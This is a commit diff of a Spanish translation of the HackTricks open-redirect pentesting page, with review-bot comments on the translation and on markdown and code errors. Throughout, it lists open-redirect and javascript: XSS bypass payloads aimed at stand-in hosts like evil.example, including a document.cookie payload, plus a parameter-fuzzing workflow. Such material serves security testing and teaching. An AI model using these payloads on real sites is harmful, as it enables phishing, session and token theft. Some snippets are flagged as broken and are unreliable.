Translated ['src/pentesting-web/open-redirect.md'] to es

This commit is contained in:
Translator 2025-10-01 15:26:20 +00:00
parent 89b3c7d386
commit 8c441ed615


@ -1,18 +1,29 @@
# Redirección Abierta
# Open Redirect
{{#include ../banners/hacktricks-training.md}}
## Redirección Abierta
## Open redirect
### Redirección a localhost o dominios arbitrarios
### Redirect to localhost or arbitrary domains
- Si la app “allows only internal/whitelisted hosts”, prueba notaciones alternativas de host para alcanzar loopback o rangos internos vía el redirect target:
- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
- Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
- Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Estos son útiles cuando solo se permiten “subdomains of X” pero la resolución del host sigue apuntando a 127.0.0.1.
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
- https://trusted.tld@attacker.tld/ → el navegador navega a attacker.tld pero simples comprobaciones de cadena “ven” trusted.tld.
- Backslash parsing confusion between frameworks/browsers:
- https://trusted.tld\@attacker.tld → algunos backends tratan “\” como un caracter de path y pasan la validación; browsers normalizan a “/” e interpretan trusted.tld como userinfo, enviando usuarios a attacker.tld. Esto también aparece en mismatches de Node/PHP URL-parser.
{{#ref}}
ssrf-server-side-request-forgery/url-format-bypass.md
{{#endref}}
### Redirección Abierta a XSS
### Modern open-redirect to XSS pivots
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
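Review bot: the translation in this hunk is incomplete: the bullets `Network-path references often bypass naive validators ...`, `Userinfo tricks defeat contains/startswith checks against trusted hosts:` and `Backslash parsing confusion between frameworks/browsers:` stay in English next to translated siblings, and the quoted phrase "allows only internal/whitelisted hosts" in the first bullet is also left untranslated; either translate them or mark them as intentionally kept in English. Minor: `caracter` in the backslash bullet should be `carácter`, and the heading `### Redirección Abierta a XSS` drops the "modern ... pivots" sense of the source heading (something like "Pivotes modernos de open redirect a XSS" keeps it). The host notations, URLs and payload tokens (127.1, 0x7f000001, //attacker.tld, lvh.me) are correctly left untranslated.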
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
## Open Redirect subiendo archivos svg
<details>
<summary>Payloads modernos de bypass basados en URL</summary>
```text
# Scheme-relative (current scheme is reused)
//evil.example
# Credentials (userinfo) trick
https://trusted.example@evil.example/
# Backslash confusion (server validates, browser normalizes)
https://trusted.example\@evil.example/
# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example
# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example
# When only path is accepted, try breaking absolute URL detection
/\\evil.example
/..//evil.example
```
```
</details>
## Open Redirect uploading svg files
```html
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
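Review bot: the `<details>` block in this hunk closes its text fence twice (one closing triple-backtick line right after `/..//evil.example` and a second one immediately below it, before `</details>`); the second one opens a new, unterminated fence in rendered markdown and swallows the rest of the page, so drop it. Also check heading placement: the translated `## Open Redirect subiendo archivos svg` sits above the `<details>` payload list while the heading it replaces, `## Open Redirect uploading svg files`, sits below it, which puts the URL bypass payloads under the SVG heading instead of the XSS pivots section; the translated heading should go directly in front of the html block.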
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
## Parámetros de inyección comunes
## Common injection parameters
```
/{payload}
?next={payload}
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
## Ejemplos de código
## Code examples
#### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
#### Java
```bash
response.redirect("http://mysafedomain.com");
```
#### PHP
```php
<?php
/* browser redirections*/
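Review bot: the .Net and Java snippets in this hunk are fenced as `bash` while the PHP one is correctly tagged `php`; tag them `csharp` and `java` so they are highlighted as code rather than shell. While here, `response.redirect("http://mysafedomain.com");` is not the Servlet API call (that is `response.sendRedirect(...)`) and the ASP.NET method is `Response.Redirect(...)`; the translation correctly left these lines untouched, but the upstream examples deserve the fix.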
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
exit;
?>
```
## Hunting and exploitation workflow (practical)
- Single URL check with curl:
```bash
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
```
- Discover and fuzz likely parameters at scale:
<details>
<summary>Click to expand</summary>
```bash
# 1) Recopila URLs históricas, conserva aquellas con parámetros comunes de redirección
cat domains.txt \
| gau --o urls.txt # or: waybackurls / katana / hakrawler
# 2) Grep parámetros comunes y normaliza la lista
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
| sed 's/\r$//' | sort -u > candidates.txt
# 3) Usa OpenRedireX para fuzz con un corpus de payloads
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
# 4) Verifica manualmente los resultados interesantes
awk '/30[1237]|Location:/I' results.txt
```
```
</details>
- No olvides los sinks del lado cliente en SPAs: busca window.location/assign/replace y los helpers del framework que leen query/hash y redirigen.
- Los frameworks a menudo introducen footguns cuando los destinos de redirección se derivan de input no confiable (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
{{#ref}}
../network-services-pentesting/pentesting-web/nextjs.md
{{#endref}}
- OAuth/OIDC flows: abusar de open redirectors frecuentemente escala a account takeover por leaking de authorization codes/tokens. Consulta la guía dedicada:
{{#ref}}
./oauth-to-account-takeover.md
{{#endref}}
- Las respuestas del servidor que implementan redirects sin Location (meta refresh/JavaScript) siguen siendo explotables para phishing y a veces pueden encadenarse. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>
```
## Herramientas
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
- OpenRedireX fuzzer para detectar open redirects. Ejemplo:
```bash
# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
## Recursos
# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
```
## Referencias
- En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.
- En https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puedes encontrar listas de fuzzing.
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
- PortSwigger Web Security Academy DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
- OpenRedireX Un fuzzer para detectar open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
{{#include ../banners/hacktricks-training.md}}
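Review bot: the translated heading `## Recursos` landed inside the OpenRedireX bash block, between the `git clone ... ./setup.sh` line and the `# Fuzz a list of candidate URLs` comment, so it renders as code and the section heading disappears; move it out in front of the fence. The fuzzing block under `Click to expand` has the same double-fence problem as the earlier hunk: two consecutive closing triple-backtick lines before `</details>`, leaving an unbalanced fence. The translation is patchy here too: the heading `## Hunting and exploitation workflow (practical)`, the two bullet lead-ins about the curl check and parameter fuzzing, the `Click to expand` summary, "See Next.js notes about redirects ..." and "Grep for:" remain in English inside otherwise Spanish text. Logic point in the fuzzing script: `awk '/30[1237]|Location:/I' results.txt` is not valid awk (the `I` case-insensitivity suffix is sed syntax); awk parses it as the match result concatenated with an empty variable `I`, which yields a non-empty string and is therefore true for every line, so nothing is filtered. Use `grep -Ei '30[1237]|Location:' results.txt` or `awk 'tolower($0) ~ /30[1237]|location:/'`. A caveat worth a comment on the single-URL check: `curl -I` sends a HEAD request and some handlers only redirect on GET, so `curl -s -o /dev/null -D - "<url>"` is the safer way to read the Location header. In the references, the PayloadsAllTheThings entry now appears twice (a markdown link with an unescaped space in its text, and a bare URL); keep one, preferably the markdown link pointing at the `%20`-encoded URL.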